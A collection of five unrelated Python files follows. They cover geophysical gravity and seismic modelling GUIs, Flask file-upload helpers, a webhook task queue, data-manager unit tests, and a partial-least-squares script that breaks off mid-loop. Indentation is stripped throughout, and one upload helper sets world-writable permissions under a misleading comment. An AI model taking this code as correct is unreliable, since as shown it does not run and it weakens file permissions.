pyplot.show()
def get_data(self):
return self.predgz
def savedata(self, fname):
data = numpy.array([self.xp, self.zp, self.predgz]).T
numpy.savetxt(fname, data, fmt='%.5f')
def connect(self):
self.densslider.on_changed(self.set_density)
self.errslider.on_changed(self.set_error)
self.fig.canvas.mpl_connect('button_press_event', self.pick)
self.fig.canvas.mpl_connect('key_press_event', self.key_press)
self.fig.canvas.mpl_connect('motion_notify_event', self.move)
def update(self):
if self.polygons:
polys = []
for p, d in zip(self.polygons, self.densities):
polys.append(Polygon(1000. * numpy.array(p), {'density': d}))
self.predgz = utils.contaminate(
talwani.gz(self.xp, self.zp, polys), self.error)
else:
self.predgz = numpy.zeros_like(self.xp)
self.predplot.set_data(self.xp * 0.001, self.predgz)
if self.gz is not None:
ymin = min(self.predgz.min(), self.gz.min())
ymax = max(self.predgz.max(), self.gz.max())
else:
ymin = self.predgz.min()
ymax = self.predgz.max()
if ymin != ymax:
self.dcanvas.set_ylim(ymin, ymax)
self.draw()
def set_density(self, value):
self.nextdens = 1000. * value
def set_error(self, value):
self.error = value
self.update()
def move(self, event):
pass
def pick(self, event):
if event.inaxes != self.mcanvas:
return 0
x, y = event.xdata, event.ydata
if (event.button == 1):
self.picking = True
self.nextpoly.append([x, y])
self.plotx.append(x)
self.ploty.append(y)
self.polyline.set_data(self.plotx, self.ploty)
self.draw()
if event.button == 3 or event.button == 2:
if len(self.nextpoly) >= 3:
self.polygons.append(self.nextpoly)
self.densities.append(float(self.nextdens))
self.update()
self.picking = False
self.plotx.append(self.nextpoly[0][0])
self.ploty.append(self.nextpoly[0][1])
self.polyline.set_data(self.plotx, self.ploty)
fill, = self.mcanvas.fill(self.plotx, self.ploty,
color=self.polyline.get_color(),
alpha=0.5)
self.polyline.set_label('%1.2f' % (0.001 * self.nextdens))
self.legend()
self.draw()
self.polyplots.append([self.polyline, fill])
self.plotx, self.ploty = [], []
self.nextpoly = []
self.polyline, = self.mcanvas.plot([], [], marker='o',
linewidth=2)
def legend(self):
self.leg = self.mcanvas.legend(loc='lower right', numpoints=1,
prop={'size': 9})
self.leg.get_frame().set_alpha(0.5)
def key_press(self, event):
if event.key == 'e':
if self.picking:
if len(self.nextpoly) == 0:
self.picking = False
self.legend()
self.draw()
return 0
self.nextpoly.pop()
self.plotx.pop()
self.ploty.pop()
self.polyline.set_data(self.plotx, self.ploty)
else:
if len(self.polygons) == 0:
return 0
self.polygons.pop()
self.densities.pop()
line, fill = self.polyplots.pop()
line.remove()
fill.remove()
self.update()
self.draw()
class BasinTrap(Moulder):
"""
Interactive gravity modeling using a trapezoidal model.
The trapezoid has two surface nodes with fixed position. The bottom two
have fixed x coordinates but movable z. The x coordinates for the bottom
nodes are the same as the ones for the surface nodes. The user can then
model by controling the depths of the two bottom nodes.
Example::
# Define the area of modeling
area = (0, 1000, 0, 1000)
# Where the gravity effect is calculated
xp = range(0, 1000, 10)
zp = [0]*len(xp)
# Where the two surface nodes are. Use depth = 1 because direct
# modeling doesn't like it when the model and computation points
# coincide
nodes = [[100, 1], [900, 1]]
# Create the application
app = BasinTrap(area, nodes, xp, zp)
# Run it (close the window to finish)
app.run()
# and save the calculated gravity anomaly profile
app.savedata("mydata.txt")
Parameters:
* area : list = [xmin, xmax, zmin, zmax]
Are of the subsuface to use for modeling. Remember, z is positive
downward.
* nodes : list of lists = [[x1, z1], [x2, z2]]
x and z coordinates of the two top nodes. Must be in clockwise order!
* xp, zp : array
Arrays with the x and z coordinates of the computation points
* gz : array
The observed gravity values at the computation points.
Will be plotted as black points together with the modeled (predicted)
data. If None, will ignore this.
"""
instructions = "Click to set node depth - Right click to change nodes"
name = "BasinTrap"
def __init__(self, area, nodes, xp, zp, gz=None):
Moulder.__init__(self, area, xp, zp, gz)
left, right = numpy.array(nodes) * 0.001
z1 = z2 = 0.001 * 0.5 * (area[3] - area[2])
self.polygons = [[left, right, [right[0], z1], [left[0], z2]]]
self.nextdens = -1000
self.densslider.set_val(self.nextdens * 0.001)
self.densities = [self.nextdens]
self.plotx = [v[0] for v in self.polygons[0]]
self.plotx.append(left[0])
self.ploty = [v[1] for v in self.polygons[0]]
self.ploty.append(left[1])
self.polyline.set_data(self.plotx, self.ploty)
self.polyline.set_color('k')
self.isleft = True
self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',
color='red', linewidth=2)
def draw_guide(self, x, z):
if self.isleft:
x0, z0 = self.polygons[0][3]
x1, z1 = self.polygons[0][2]
else:
x0, z0 = self.polygons[0][2]
x1, z1 = self.polygons[0][3]
self.guide.set_data([x0, x0, x1], [z0, z, z1])
def move(self, event):
if event.inaxes != self.mcanvas:
return 0
self.draw_guide(event.xdata, event.ydata)
self.draw()
def set_density(self, value):
self.densities[0] = 1000. * value
self.update()
self.draw()
def pick(self, event):
if event.inaxes != self.mcanvas:
return 0
x, y = event.xdata, event.ydata
if (event.button == 1):
if self.isleft:
self.polygons[0][3][1] = y
self.ploty[3] = y
else:
self.polygons[0][2][1] = y
self.ploty[2] = y
self.polyline.set_data(self.plotx, self.ploty)
self.guide.set_data([], [])
self.update()
self.draw()
if event.button == 3 or event.button == 2:
self.isleft = not self.isleft
self.draw_guide(x, y)
self.draw()
def key_press(self, event):
pass
class BasinTri(Moulder):
"""
Interactive gravity modeling using a triangular model.
The triangle has two surface nodes with fixed positions. The user can then
model by controling the bottom node.
Example::
# Define the area of modeling
area = (0, 1000, 0, 1000)
# Where the gravity effect is calculated
xp = range(0, 1000, 10)
zp = [0]*len(xp)
# Where the two surface nodes are. Use depth = 1 because direct
# modeling doesn't like it when the model and computation points
# coincide
nodes = [[100, 1], [900, 1]]
# Create the application
app = BasinTri(area, nodes, xp, zp)
# Run it (close the window to finish)
app.run()
# and save the calculated gravity anomaly profile
app.savedata("mydata.txt")
Parameters:
* area : list = [xmin, xmax, zmin, zmax]
Are of the subsuface to use for modeling. Remember, z is positive
downward.
* nodes : list of lists = [[x1, z1], [x2, z2]]
x and z coordinates of the two top nodes. Must be in clockwise order!
* xp, zp : array
Arrays with the x and z coordinates of the computation points
* gz : array
The observed gravity values at the computation points.
Will be plotted as black points together with the modeled (predicted)
data. If None, will ignore this.
"""
instructions = "Click to set node location"
name = "BasinTri"
def __init__(self, area, nodes, xp, zp, gz=None):
Moulder.__init__(self, area, xp, zp, gz)
left, right = numpy.array(nodes) * 0.001
z = 0.001 * 0.5 * (area[3] - area[2])
x = 0.5 * (right[0] + left[0])
self.polygons = [[left, right, [x, z]]]
self.nextdens = -1000
self.densslider.set_val(self.nextdens * 0.001)
self.densities = [self.nextdens]
self.plotx = [v[0] for v in self.polygons[0]]
self.plotx.append(left[0])
self.ploty = [v[1] for v in self.polygons[0]]
self.ploty.append(left[1])
self.polyline.set_data(self.plotx, self.ploty)
self.polyline.set_color('k')
self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',
color='red', linewidth=2)
def draw_guide(self, x, z):
x0, z0 = self.polygons[0][0]
x1, z1 = self.polygons[0][1]
self.guide.set_data([x0, x, x1], [z0, z, z1])
def move(self, event):
if event.inaxes != self.mcanvas:
return 0
self.draw_guide(event.xdata, event.ydata)
self.draw()
def set_density(self, value):
self.densities[0] = 1000. * value
self.update()
self.draw()
def pick(self, event):
if event.inaxes != self.mcanvas:
return 0
x, y = event.xdata, event.ydata
if (event.button == 1):
self.polygons[0][2] = [x, y]
self.plotx[2] = x
self.ploty[2] = y
self.polyline.set_data(self.plotx, self.ploty)
self.guide.set_data([], [])
self.update()
self.draw()
def key_press(self, event):
pass
class Lasagne():
"""
Interactive modeling of vertical seismic profiling for 1D layered media.
The wave source is assumed to be on the surface of a vertical borehole. The
receivers are at given depths. What is measured is the travel-time of
first arrivals.
Assumes that the thickness of the layers are known. The user then only
needs to choose the velocities.
Example::
# Define the thickness of the layers
thickness = [10, 20, 5, 10]
# Define the measuring points along the well
zp = range(1, sum(thickness), 1)
# Define the velocity range
vmin, vmax = 1, 10000
# Run the application
app = Lasagne(thickness, zp, vmin, vmax)
app.run()
# Save the modeled data
app.savedata("mydata.txt")
Parameters:
* thickness : list
The thickness of each layer in order of increasing depth
* zp : list
The depths of the measurement stations (seismometers)
* vmin, vmax : float
Range of velocities to allow
* tts : array
The observed travel-time values at the measurement stations. Will be
plotted as black points together with the modeled (predicted) data.
If None, will ignore this.
"""
instructions = "Click to set the velocity of the layers"
name = "Lasagne - Vertical seismic profiling for 1D layered media"
def __init__(self, thickness, zp, vmin, vmax, tts=None):
if tts is not None:
if len(tts) != len(zp):
raise ValueError("zp and tts must have same size")
if vmin <= 0. or vmax <= 0.:
raise ValueError("Can't have velocity vmin or vmax <= 0")
self.tts = tts
self.zp = zp
self.thickness = thickness
# Make the figure
self.fig = pyplot.figure(figsize=(14, 8))
self.fig.canvas.set_window_title(self.name)
self.fig.suptitle(self.instructions)
self.draw = self.fig.canvas.draw
# Make the data and model canvas
self.dcanvas = self.fig.add_subplot(1, 2, 1)
self.dcanvas.set_ylabel("Depth (m)")
self.dcanvas.set_xlabel("Travel-time (s)")
self.dcanvas.set_ylim(sum(thickness), 0)
self.dcanvas.grid()
self.dcanvas.set_ylim(sum(thickness), 0)
self.mcanvas = self.fig.add_subplot(1, 2, 2)
self.mcanvas.set_ylabel("Depth (m)")
self.mcanvas.set_xlabel("Velocity (m/s2)")
self.mcanvas.set_xlim(vmin, vmax)
self.mcanvas.set_ylim(sum(thickness), 0)
self.mcanvas.grid()
self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.15,
hspace=0.1)
# Make the sliders
sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])
self.errslider = widgets.Slider(sliderax, 'Error',
0, 10, valinit=0.,
valfmt='%2.1f (percent)')
# Initialize the data
self.error = 0.
self.velocity = vmin * numpy.ones_like(thickness)
self.predtts = profile.layered_straight_ray(thickness, self.velocity,
zp)
self.layers = [sum(thickness[:i]) for i in xrange(len(thickness) + 1)]
self.predplot, = self.dcanvas.plot(self.predtts, zp, '-r', linewidth=2)
if self.tts is not None:
self.ttsplot, = self.dcanvas.plot(self.tts, self.zp, 'ok')
self.ploty = [self.layers[0]]
for y in self.layers[1:-1]:
self.ploty.append(y)
self.ploty.append(y)
self.ploty.append(self.layers[-1])
self.plotx = numpy.zeros_like(self.ploty)
self.layerplot, = self.mcanvas.plot(self.plotx, self.ploty, 'o-k',
linewidth=2)
self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',
color='red', linewidth=2)
def run(self):
self.connect()
pyplot.show()
def get_data(self):
return self.predtts
def savedata(self, fname):
data = numpy.array([self.zp, self.predtts]).T
numpy.savetxt(fname, data, fmt='%.5f')
def connect(self):
self.errslider.on_changed(self.set_error)
self.fig.canvas.mpl_connect('button_press_event', self.pick)
self.fig.canvas.mpl_connect('key_press_event', self.key_press)
self.fig.canvas.mpl_connect('motion_notify_event', self.move)
def set_error(self, value):
self.error = 0.01 * value
self.update()
self.draw()
def update(self):
self.predtts = utils.contaminate(
profile.layered_straight_ray(self.thickness, self.velocity,
self.zp),
self.error, percent=True)
self.predplot.set_data(self.predtts, self.zp)
if self.tts is not None:
xmin = min(self.predtts.min(), self.tts.min())
xmax = max(self.predtts.max(), self.tts.max())
else:
xmin = self.predtts.min()
xmax = self.predtts.max()
if xmin != xmax:
self.dcanvas.set_xlim(xmin, xmax)
def draw_guide(self, x, z):
i = bisect.bisect(self.layers, z)
if i > 0:
z1 = self.layers[i - 1]
z2 = self.layers[i]
x1 = self.velocity[i - 1]
self.guide.set_data([x1, x, x, x1], [z1, z1, z2, z2])
def move(self, event):
if event.inaxes != self.mcanvas:
return 0
self.draw_guide(event.xdata, event.ydata)
self.draw()
def pick(self, event):
if event.inaxes != self.mcanvas:
return 0
x, z = event.xdata, event.ydata
if (event.button == 1):
i = bisect.bisect(self.layers, z) - 1
self.velocity[i] = x
self.plotx[2 * i] = x
self.plotx[2 * i + 1] = x
self.layerplot.set_data(self.plotx, self.ploty)
self.guide.set_data([], [])
self.update()
self.draw()
def key_press(self, event):
pass
|
"""
Utility functions for views.
"""
import os
import json
import traceback
import logging
import fnmatch
import sh
from werkzeug.utils import secure_filename
from nephele2.nephele.upload_file import uploadfile
from nephele2.infra.utils.map_validator import MapType
LOGGER = logging.getLogger()
def get_remote_file_list(job_base_dir, allowed_file_exts):
"""
Gets a list of all file names with the allowed extensions from a
.listing file generated by wget. Note, if the structure of the .listing
file ever changes, this method will fail.
Args:
job_base_dir (str): the directory path where the .listing file is
located allowed_file_exts (str): set of allowed file extensions
Returns:
list: a list of filename strings
Raises:
Exception: any exception generated while trying to read the .listing
file
"""
try:
# get the list from the .listing file
# awk '{out=""; for(i=9;i<=NF;i++){out=out" "$i}; print out}'
# ~/Projects/tmp/.listing
f_list = sh.awk(
'{out=""; for(i=9;i<=NF;i++){out=out" "$i}; print out}',
job_base_dir+'.listing')
files = []
for f_name in f_list:
files.append(f_name.strip())
allowed_exts = ["*."+str(e) for e in list(allowed_file_exts)]
file_list = []
for ext in allowed_exts:
for f_name in fnmatch.filter(files, ext):
file_list.append(f_name)
return file_list
except BaseException:
LOGGER.error(
"Error getting file names from .listing file at " +
str(job_base_dir + '.listing') + "\n" + str(traceback.format_exc()))
raise
def get_filename_from_path(url_path):
"""
Extracts a filename from the end of a URL that points to the file.
Args:
url_path (url): a URL pointing to a file
Returns:
ASCII str: a secure filename
"""
try:
path = url_path.rsplit('/', 1)[1]
return secure_filename(path)
except Exception:
LOGGER.error("Error parsing file URL "+str(url_path) +
"\n" + str(traceback.format_exc()))
raise
def get_non_job_argslist(details_form):
"""
Gets a list of all fields returned with the Job options forms that
shouldn't be included in the job args list put in the database.
Args:
details_form (WTForm): the JobDetails form (a form that is
used as a base for most other job
options forms)
Returns:
list: list of arguments to remove from the job_args list
"""
details_list = ['csrf_token', 'start_job']
for fieldname, value in details_form.data.items():
details_list.append(fieldname)
return details_list
# TODO: we could move this down into the job_type table in the DB
# if we want to store all info about a job in one place
def get_analysis_type(data_type):
"""
Return the MapType associated with the data type.
Args:
data_type (str): The type of sequence data being provided
Returns:
MapType: The MapType associated with the data type
"""
if data_type == "SE":
analysis = MapType.SE_DEMULTIPLEX
elif data_type in ["PE", "ITS_PE"]:
analysis = MapType.PAIRED_END
elif data_type == "WGS_PE":
analysis = MapType.PE_WGS
elif data_type == "WGS_SE":
analysis = MapType.SE_WGS
elif data_type == "QC_PE":
analysis = MapType.PE_QC
elif data_type == "QC_SE":
analysis = MapType.SE_QC
elif data_type == "DS_Analysis":
analysis = MapType.DS_ANALYSIS
else:
analysis = MapType.STANDARD
return analysis
def get_column_map(table_data):
col_map = {}
for row in table_data:
for col_label in row:
col_map.setdefault(col_label, []).append(row[col_label])
return col_map
##### BLUEIMP STUFF #####
# TODO: see if we can get blueimp to play nice with WTF so we can get rid of
# this
def allowed_file(filename, allowed_exts):
"""
The validator for blueimp that limits which file extensions are allowed.
Args:
filename (str): a filepath
allowed_exts (str): set of allowed file extensions
Returns:
bool: True if extension is an allowed file type, False otherwise
"""
allowed_extensions = ["*."+str(e) for e in list(allowed_exts)]
for ext in allowed_extensions:
if fnmatch.fnmatch(filename.lower(), ext):
return True
return False
def get_file_list(uniq_dname):
"""
Returns a list of files in the directory. Required to return
a JSON by blueimp.
Args:
uniq_dname (str): filepath to the directory to query
Returns:
JSON: a JSON structured like '{"files": [list_of_filepaths]}'
"""
file_display = []
try:
files = [f for f in os.listdir(uniq_dname) if os.path.isfile(
os.path.join(uniq_dname, f))]
for f in files:
size = os.path.getsize(os.path.join(uniq_dname, f))
file_saved = uploadfile(name=f, size=size)
file_display.append(file_saved.get_file())
return json.dumps({"files": file_display})
except OSError:
LOGGER.error("Error while getting the list of files in dir "
+ str(uniq_dname)+": "+str(traceback.format_exc()))
# This could be a FileNotFound err from the dir not existing,
# or a PermissionError thrown from the getsize call
# TODO: decide if this is the right thing to do,
# it will just return whatever it's found so far
return json.dumps({"files": file_display})
def save_file(dirname, files, allowed_exts):
"""
Save file function called by blueimp. Must return a JSON of the list of
upload_file objects that were saved, or failed to save.
Args:
dirname (str): The path to the directory where the files
should be saved
files (str): name of the file to save
data_type (str): the data_type of the file (from the HTML header)
Returns:
JSON: a JSON string that looks like {"files": [uploadfile().get_file()]}
"""
try:
filename = secure_filename(files.filename)
mime_type = files.content_type
if not allowed_file(files.filename, allowed_exts):
result = uploadfile(name=filename,
type=mime_type,
size=0,
not_allowed_msg="File type not allowed")
else:
# save file to disk
uploaded_file_path = os.path.join(dirname, filename)
files.save(uploaded_file_path)
os.chmod(uploaded_file_path, 0o666) # chmod a-x
# get file size after saving
size = os.path.getsize(uploaded_file_path)
# return json for js call back
result = uploadfile(name=filename, type=mime_type, size=size)
return json.dumps({"files": [result.get_file()]})
except FileNotFoundError:
LOGGER.error("File not found "+str(traceback.format_exc()))
result = uploadfile(name=files.filename,
type=files.content_type,
size=0,
not_allowed_msg="INTERNAL SERVER ERROR")
return json.dumps({"files": [result.get_file()]})
except Exception:
LOGGER.error("Could not save file " + str(traceback.format_exc()))
result = uploadfile(name=files.filename,
type=files.content_type,
size=0,
not_allowed_msg="INTERNAL SERVER ERROR")
return json.dumps({"files": [result.get_file()]})
def delete_file(dirname, filename):
"""
Deletes a file from a given directory.
This method is used by blueimp and is required
to return a JSON with the structure {<filename>: is_deleted}.
Args:
dirname (str): path of the directory the file should be removed from
filename (str): name of the file to delete
Returns:
JSON: a JSON with the name of the file and a boolean indication of
whether or not it was deleted
"""
file_path = os.path.join(dirname, filename)
if os.path.exists(file_path):
try:
os.remove(file_path)
return json.dumps({filename: 'True'})
except Exception:
return json.dumps({filename: 'False'})
return json.dumps({filename: 'False'})
|
<filename>lystener/task.py
# -*- encoding:utf-8 -*-
# © <NAME>
import os
import sys
import json
import queue
import sqlite3
import hashlib
import traceback
import threading
import importlib
from lystener import logMsg, loadJson, DATA, JSON
def initDB():
database = os.path.join(DATA, "database.db")
if not os.path.exists(DATA):
os.makedirs(DATA)
sqlite = sqlite3.connect(database)
cursor = sqlite.cursor()
cursor.execute(
"CREATE TABLE IF NOT EXISTS "
"fingerprint(hash TEXT UNIQUE, token TEXT);"
)
cursor.execute(
"CREATE TABLE IF NOT EXISTS "
"history(signature TEXT UNIQUE, token TEXT);"
)
sqlite.row_factory = sqlite3.Row
sqlite.commit()
return sqlite
def vacuumDB():
sqlite = sqlite3.connect(
os.path.join(DATA, "database.db"),
isolation_level=None
)
sqlite.row_factory = sqlite3.Row
token = [
row["token"] for row in
sqlite.execute(
"SELECT DISTINCT token FROM history"
).fetchall()
]
for tok in [
loadJson(name).get("token", None) for name in os.listdir(JSON)
if name.endswith(".json")
]:
if tok not in token:
cleanDB(sqlite, tok)
sqlite.execute("VACUUM")
sqlite.commit()
sqlite.close()
def cleanDB(sqlite, token):
logMsg("removing hitory of token %s..." % token)
sqlite.execute("DELETE FROM fingerprint WHERE token=?", (token,))
sqlite.execute("DELETE FROM history WHERE token=?", (token,))
def trace(sqlite, token, content):
sqlite.execute(
"INSERT INTO fingerprint(hash, token) VALUES(?, ?);",
(jsonHash(content), token)
)
def untrace(sqlite, token, content):
sqlite.execute(
"DELETE FROM fingerprint WHERE hash=? AND token=?",
(jsonHash(content), token)
)
def webhookName(auth, mod, func):
return "%s.json" % hashlib.sha256(
f"whk://{auth}.{mod}.{func}".encode("utf-8")
).hexdigest()
def isGenuineWebhook(auth, webhhook={}):
token = auth + webhhook.get("token", "")
return hashlib.sha256(
token.encode("utf-8")
).hexdigest() == webhhook.get("hash", "")
def jsonHash(data):
raw = json.dumps(data, sort_keys=True, separators=(',', ':'))
h = hashlib.sha256(raw.encode("utf-8")).hexdigest()
return h.decode() if isinstance(h, bytes) else h
def setInterval(interval):
"""
threaded decorator.
>>> @setInterval(10)
... def tick():
... print("Tick")
>>> event = tick() # print 'Tick' every 10 sec
>>> type(event)
<class 'threading.Event'>
>>> event.set() # stop printing 'Tick' every 10 sec
"""
def decorator(function):
"""Main decorator function."""
def wrapper(*args, **kwargs):
"""Helper function to create thread."""
stopped = threading.Event()
# executed in another thread
def loop():
"""Thread entry point."""
# until stopped
while not stopped.wait(interval):
function(*args, **kwargs)
t = threading.Thread(target=loop)
# stop if the program exits
t.daemon = True
t.start()
return stopped
return wrapper
return decorator
class Task(threading.Thread):
STOP = threading.Event()
LOCK = threading.Lock()
def __init__(self, *args, **kwargs):
threading.Thread.__init__(self)
self.daemon = True
self.start()
class MessageLogger(Task):
JOB = queue.Queue()
def run(self):
logMsg("MessageLogger is running in background...")
while not Task.STOP.is_set():
msg = MessageLogger.JOB.get()
try:
Task.LOCK.acquire()
logMsg(msg)
except Exception as exception:
msg = "log error:\n%r\n%s" % \
(exception, traceback.format_exc())
finally:
Task.LOCK.release()
logMsg("exiting MessageLogger...")
@staticmethod
def log(msg):
MessageLogger.JOB.put(msg)
class FunctionCaller(Task):
JOB = queue.Queue()
def run(self):
logMsg("FunctionCaller is running in background...")
while not Task.STOP.is_set():
func, args, kwargs = FunctionCaller.JOB.get()
try:
Task.LOCK.acquire()
response = func(*args, **kwargs)
except Exception as exception:
msg = "%s response:\n%r\n%s" % \
(func, exception, traceback.format_exc())
else:
msg = "%s response:\n%r" % (func, response)
finally:
Task.LOCK.release()
# push msg
MessageLogger.JOB.put(msg)
logMsg("exiting FunctionCaller...")
@staticmethod
def call(func, *args, **kwargs):
FunctionCaller.JOB.put([func, args, kwargs])
class TaskChecker(Task):
JOB = queue.Queue()
DB = None
def run(self):
# sqlite db opened within thread
TaskChecker.DB = initDB()
logMsg("TaskChecker is running in background...")
# run until Task.killall() called
while not Task.STOP.is_set():
skip = True
# wait until a job is given
module, name, auth, content = TaskChecker.JOB.get()
# get webhook data
webhook = loadJson(webhookName(auth, module, name))
# compute security hash
if not isGenuineWebhook(auth, webhook):
msg = "not authorized here\n%s" % json.dumps(content, indent=2)
else:
# build a signature
signature = "%s@%s.%s[%s]" % (
webhook["event"], module, name, jsonHash(content)
)
skip = False
if not skip:
# import asked module
try:
obj = importlib.import_module("lystener." + module)
except Exception as exception:
skip = True
msg = "%r\ncan not import python module %s" % \
(exception, module)
else:
# try to get function by name
TaskExecutioner.MODULES.add(obj)
func = getattr(obj, name, False)
if callable(func):
TaskExecutioner.JOB.put(
[func, content, webhook["token"], signature]
)
msg = "forwarded: " + signature
else:
skip = True
msg = "python definition %s not found in %s or is " \
"not callable" % (name, module)
if skip and "token" in webhook:
Task.LOCK.acquire()
# ATOMIC ACTION -----------------------------------------------
untrace(TaskChecker.DB, webhook["token"], content)
TaskChecker.DB.commit()
# END ATOMIC ACTION -------------------------------------------
Task.LOCK.release()
# push msg
MessageLogger.JOB.put(msg)
logMsg("exiting TaskChecker...")
class TaskExecutioner(Task):
JOB = queue.Queue()
MODULES = set([])
DB = None
def run(self):
logMsg("TaskExecutioner is running in background...")
TaskExecutioner.DB = initDB()
while not Task.STOP.is_set():
error = True
response = {}
# wait until a job is given
func, data, token, sig = TaskExecutioner.JOB.get()
try:
response = func(data)
except Exception as exception:
msg = "%s response:\n%s\n%s" % \
(func, "%r" % exception, traceback.format_exc())
else:
error = False
msg = "%s response:\n%s" % (func, response)
# push msg
MessageLogger.JOB.put(msg)
# daemon waits here to log results, update database and clean
# memory
try:
Task.LOCK.acquire()
# ATOMIC ACTION -----------------------------------------------
if not error and response.get("success", False):
TaskExecutioner.DB.execute(
"INSERT OR REPLACE INTO history(signature, token) "
"VALUES(?, ?);", (sig, token)
)
# remove the module if all jobs done so if code is modified it
# will be updated without a listener restart
if TaskExecutioner.JOB.empty():
empty = False
while not empty:
try:
obj = TaskExecutioner.MODULES.pop()
except Exception:
empty = True
else:
sys.modules.pop(obj.__name__, False)
del obj
except Exception as exception:
MessageLogger.JOB.put(
"Internal error occured:\n%s\n%s" %
("%r" % exception, traceback.format_exc())
)
finally:
if error:
untrace(TaskExecutioner.DB, token, data)
TaskExecutioner.DB.commit()
# END ATOMIC ACTION -------------------------------------------
Task.LOCK.release()
logMsg("exiting TaskExecutioner...")
def killall():
Task.STOP.set()
MessageLogger.JOB.put("kill signal sent !")
FunctionCaller.JOB.put([lambda n: n, {"Exit": True}, {}])
TaskChecker.JOB.put(["", "", "?", {}])
TaskExecutioner.JOB.put([lambda n: n, {"success": False}, "", ""])
|
<reponame>RelationRx/pyrelational
"""Unit tests for data manager
"""
import pytest
import torch
from pyrelational.data import GenericDataManager
from tests.test_utils import DiabetesDataset, get_classification_dataset
def test_init_and_basic_details():
gdm = get_classification_dataset(50)
assert gdm.loader_batch_size == 10
assert len(gdm.l_indices) == 50
def test_print():
gdm = get_classification_dataset(50)
assert repr(gdm) == "GenericDataManager"
out = "GenericDataManager\nTraining set size: 400\nLabelled: 50, Unlabelled: 350\nPercentage Labelled: 0.125"
assert str(gdm) == out
def test_get_train_set():
gdm = get_classification_dataset(50)
tl = gdm.get_train_set()
assert len(tl) == 400
def test_update_train_labels():
gdm = get_classification_dataset(50)
random_u_sindex = gdm.u_indices[0]
len_gdm_l = len(gdm.l_indices)
len_gdm_u = len(gdm.u_indices)
gdm.update_train_labels([random_u_sindex])
assert random_u_sindex in gdm.l_indices
assert len(gdm.l_indices) > len_gdm_l
assert len(gdm.u_indices) < len_gdm_u
def test_percentage_labelled():
gdm = get_classification_dataset()
percentage = gdm.percentage_labelled()
assert percentage == pytest.approx(0.1, 0.05)
def test_get_dataset_size():
gdm = get_classification_dataset()
ds_size = len(gdm)
assert ds_size == 569
def test_resolving_dataset_indices():
"""Testing different user inputs to dataset split indices"""
ds = DiabetesDataset()
train_ds, valid_ds, test_ds = torch.utils.data.random_split(ds, [350, 50, 42])
valid_indices = valid_ds.indices
# Check case 5 only validation raises error
with pytest.raises(ValueError) as case5:
GenericDataManager(
ds,
validation_indices=valid_indices,
loader_batch_size=10,
)
assert str(case5.value) == "No train or test specified, too ambigious to set values"
# Check case 5 only validation raises error
with pytest.raises(ValueError) as case6:
GenericDataManager(
ds,
test_indices=test_ds.indices,
loader_batch_size=10,
)
assert str(case6.value) == "No train or validation specified, too ambigious to set values"
# TODO HANDLE OTHER CASES
def test_empty_train_set():
"""Testing that we throw an error when we produce a datamanager with
an empty train set
"""
# Case 1: user gives empty train set
ds = DiabetesDataset()
# Artificially create a test leakage as example
train_ds, valid_ds, test_ds = torch.utils.data.random_split(ds, [0, 400, 42])
train_indices = train_ds.indices
valid_indices = valid_ds.indices
test_indices = test_ds.indices
with pytest.raises(ValueError) as e_info:
GenericDataManager(
ds,
train_indices=train_indices,
validation_indices=valid_indices,
test_indices=test_indices,
loader_batch_size=10,
)
assert str(e_info.value) == "The train set is empty"
# Case 2: empty train set produced by resolving of indices
_, valid_ds, test_ds = torch.utils.data.random_split(ds, [0, 400, 42])
valid_indices = valid_ds.indices
test_indices = test_ds.indices
with pytest.raises(ValueError) as e_info:
GenericDataManager(
ds,
validation_indices=valid_indices,
test_indices=test_indices,
loader_batch_size=10,
)
assert str(e_info.value) == "The train set is empty"
def test_resolving_dataset_check_split_leaks():
"""Check we throw an error for data split leaks"""
ds = DiabetesDataset()
# Artificially create a test leakage as example
train_ds, valid_ds, test_ds = torch.utils.data.random_split(ds, [350, 50, 42])
train_indices = train_ds.indices
valid_indices = valid_ds.indices
test_indices = valid_ds.indices # we have leak here
# Check no leaks
with pytest.raises(ValueError) as e_info:
GenericDataManager(
ds,
train_indices=train_indices,
validation_indices=valid_indices,
test_indices=test_indices,
loader_batch_size=10,
)
assert str(e_info.value) == "There is overlap between the split indices supplied"
|
<reponame>cdek11/PLS
# coding: utf-8
# In[ ]:
# Code to implement the initial version of the PLS Algorithm
import pandas as pd
import numpy as np
def pls(path, path_test, predictors, response):
'''Function that takes a dataframe and runs partial least squares on numeric predictors for a numeric response.
Returns the residuals of the predictor (X block), response (Y block), and traininig RMSE'''
combined = predictors #Ready list to combine the predictors and response to get both sets of data
###Data preparation
data = pd.DataFrame.from_csv(path) #Retrieve full csv data from local machine
combined.append(response) #Add the response to the list of variables to get from data set
data = data[combined] #Only retrieve the predictors and response
response_std = data[response].std() #Store the response variable standard deviation to scale the RMSE to real units at end
#Subtract the mean from each column
data = data - data.mean()
#Scale each column by the column standard deviation
data = data/data.std()
#Separate in to design matrix (X block) and response column vector (Y block)
predictors.pop() #Remove the response variable from the predictors list
X = data[predictors].as_matrix() #Create a matrix of predictor values
Y = data[[response]].as_matrix() #Create a matrix of predictor values
Y_true = Y #Store the true Y values for prediction later
#Get rank of matrix
rank = np.linalg.matrix_rank(X) #Store rank of matrix because this is the maximum number of components the model can have
#PLS algorithm
u = Y #Set intital u value as response variables
Xres_dictionary = {} #Create a dictionary for the residuals from the decomposition of the X block
Yres_dictionary = {} #Create a dictionary for the residuals from the decomposition of the Y block
q_new_dictionary ={} #Create a dictionary for row vectors of q loadings for the Y block
b_dictionary = {} #Create a dictionary for scalar regression coefficient for PLS components
t_hat_dictionary = {} #Create a dictionary for the matrix of X scores
t_hat_train_dictionary = {} #Create a dictionary for the matrix of X scores for training data
t_hat_test_dictionary = {} #Create a dictionary for the matrix of X scores for test data
RMSE_dictionary = {} #Create a dictionary to store RMSE for training data
RMSE_test_dictionary = {} #Create a dictionary to store RMSE for test data
for i in range(1,(rank+1)):
Y_pred = np.zeros((Y_true.shape[0],1))
#Here we have one variable in the Y block so q = 1
#and omit steps 5-8
q = 1
#For the X block, u = Y
u = Y #random y column from Y #Step 1
w_old = np.dot(u.T,X)/np.dot(u.T,u) #Step 2
w_new = w_old/np.linalg.norm(w_old) #Step 3
t = np.dot(X,w_new.T)/np.dot(w_new,w_new.T) #Step 4
#For the Y block can be omitted if Y only has one variable
q_old = np.dot(t.T,Y)/np.dot(t.T,t) #Step 5
q_new = q_old/np.linalg.norm(q_old) #Step 6
